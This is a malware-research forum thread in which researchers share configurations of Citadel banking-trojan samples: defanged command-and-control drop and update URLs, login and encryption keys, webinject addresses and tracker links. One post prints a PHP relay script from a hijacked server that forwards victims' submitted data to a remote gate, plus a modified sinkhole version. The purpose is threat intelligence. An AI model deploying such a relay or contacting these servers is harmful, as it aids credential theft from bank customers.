[Kafeine]

Kafeine attached the wrong sample, simple as that :)

Yes Sorry. (got both in the same browsing run)

[MountFranklin]

No probs Kafeine, appreciate your help as always

Thanks Xylitol for the sample.

More power guys. Cheers!

[Xylitol]

Citadel targeting America, Germany, Spanish, Italy, United Kingdom and some services like ebay, paypal, yandex, perfectmoney...

Code: Select all

Drop: hxtp://rag.su/main/vorota.php
Update: hxtp://rag.su/main/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: 59 59 77 10 14 03 03 9B 51 CD 65 D2 A2 45 EE 37

https://zeustracker.abuse.ch/monitor.php?host=rag.su
https://www.virustotal.com/en/file/2808 ... 386155673/
webinject:

Code: Select all

https://secure-gateway2010.org/in675/x.php?cmdid=8&gettype=js&id=core2.js&uid=0000

[Xylitol]

Citadel targeting Poland

Code: Select all

Drop: hxtp://109.235.51.68:54172/wus/2.php
Update:  hxtp://srv1.freedom-dns.ru:54172/wus/1.php
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: BD CA A6 B8 57 00 1F 63 54 44 AB 83 DF B9 A3 F7

https://zeustracker.abuse.ch/monitor.ph ... dom-dns.ru
https://www.virustotal.com/en/file/94dc ... 386239219/
webinject:

Code: Select all

https://iv-auth.org/a/www.php

[Xylitol]

lol:

Targeting wellsfargo.

Code: Select all

Drop: hxtp://uaecarmarket.org/font/fade/gate.php
Update: hxtp://uaecarmarket.org/font/fade/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: F7 60 EA 00 6D 2E 97 7B 80 AA 57 94 87 C1 44 19

https://zeustracker.abuse.ch/monitor.ph ... market.org

[Xylitol]

lol 2:

Targeting wellsfargo.

Code: Select all

Drop: hxtp://180.151.58.244:8080/Base/baseconf/gate.php
Update: hxtp://180.151.58.244:8080/Base/baseconf/ningga.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: 63 E7 D8 90 84 29 A9 5C D2 54 2F 26 A9 9E 7E 78
enc key: EE801318260CN

https://zeustracker.abuse.ch/monitor.ph ... 151.58.244
https://www.virustotal.com/en/file/8149 ... 386594831/

[FafZee]

@Xylitol for the second, it seems that there was another installation (perhaps for tests ?) and if the xampp configuration stay the same, we will find other sh!ts on this ip :/

[Xylitol]

@FafZee, the previous xamp server seem down now.

Code: Select all

Drop: hxtp://82.146.56.132/gate.php
Update: hxtp://82.146.56.132/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: FC 1E 6A 7A 6C 1C B9 30 AE 82 37 FE D2 C8 50 12

https://zeustracker.abuse.ch/monitor.ph ... 146.56.132
https://www.virustotal.com/en/file/5089 ... 386859450/
No webinject, still it's stealing info.

[Xylitol]

No sample but redirect found on a hijacked server:

Code: Select all

<?php
$url = "http://62.75.220.183/superman/gate.php";
@error_reporting(0); @set_time_limit(0);
$url = @parse_url($url);
if(!isset($url['port']))$url['port'] = 80; 
if(($real_server = @fsockopen($url['host'], $url['port'])) === false)die('E1');
if(($data = @file_get_contents('php://input')) === false)$data = '';
$request  = "POST {$url['path']}?ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.1\r\n";
$request .= "Host: {$url['host']}\r\n";
if(!empty($_SERVER['HTTP_USER_AGENT']))$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";
//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: ".strlen($data)."\r\n";
$request .= "Connection: Close\r\n";
fwrite($real_server, $request."\r\n".$data);
$result = '';
while(!feof($real_server))$result .= fread($real_server, 1024);
fclose($real_server);
echo substr($result, strpos($result, "\r\n\r\n") + 4);
?>

https://zeustracker.abuse.ch/monitor.ph ... mlikes.com

Code: Select all

http://62.75.220.183/superman/install/index.php <- 1.3.4.5
http://62.75.220.183/superman/_reports571334075/

First seen on my tracker: 02/07/2013

Edit: i'm 'sinkholing' logs:

Code: Select all

<?php
$url = "http://62.75.220.183/superman/gate.php";
@error_reporting(0); @set_time_limit(0);
$url = @parse_url($url);
if(!isset($url['port']))$url['port'] = 80;
if(($real_server = @fsockopen($url['host'], $url['port'])) === false)die('E1');
if(($data = @file_get_contents('php://input')) === false)$data = '';
$request  = "POST {$url['path']}?ip=" . urlencode($_SERVER['REMOTE_ADDR']) . " HTTP/1.1\r\n";
$request .= "Host: {$url['host']}\r\n";
if(!empty($_SERVER['HTTP_USER_AGENT']))$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";
//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: " . strlen($data) . "\r\n";
$request .= "Connection: Close\r\n";
$output   = $request . "\r\n" . $data;
fwrite($real_server, $output);
$result = '';
while (!feof($real_server))$result .= fread($real_server, 1024);
fclose($real_server);
$input = substr($result, strpos($result, "\r\n\r\n") + 4);
file_put_contents('logs/' . uniqid() . '.log', $output . "\r\n\r\n\r\n" . $input);
echo($input);
?>

Edit 2:
Okay, Citadel version 1.3.4.5
Targeting Italy and some services like blogger, mail.google, zynga.com, netflix.com...

Code: Select all

Drop: hxtp://adamlikes.com/wp-content/uploads/1n388.php
Update: hxtp://185.25.116.194/20mf9sl.php|file=al888al.exe
Login key: F197EC5F0400E32FA9DD6AD090CFC61F
Key: DF 06 D7 B9 E6 17 C2 F2 7F E7 CE 1C 20 84 5D 75

John Doe 79
https://www.virustotal.com/en/file/95e5 ... 387117759/

[Xylitol]

Citadel targeting Canada

Code: Select all

Drop: hxtp://wmzbase.ru/01net/gate.php
Update: hxtp://wmzbase.ru/01net/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: 33 F1 D7 31 61 F5 80 D2 6B B8 70 27 AB 01 85 33

Same actor as: http://www.kernelmode.info/forum/viewto ... 110#p21457 and same webinject.
https://zeustracker.abuse.ch/monitor.ph ... wmzbase.ru
https://www.virustotal.com/en/file/eb02 ... 387034327/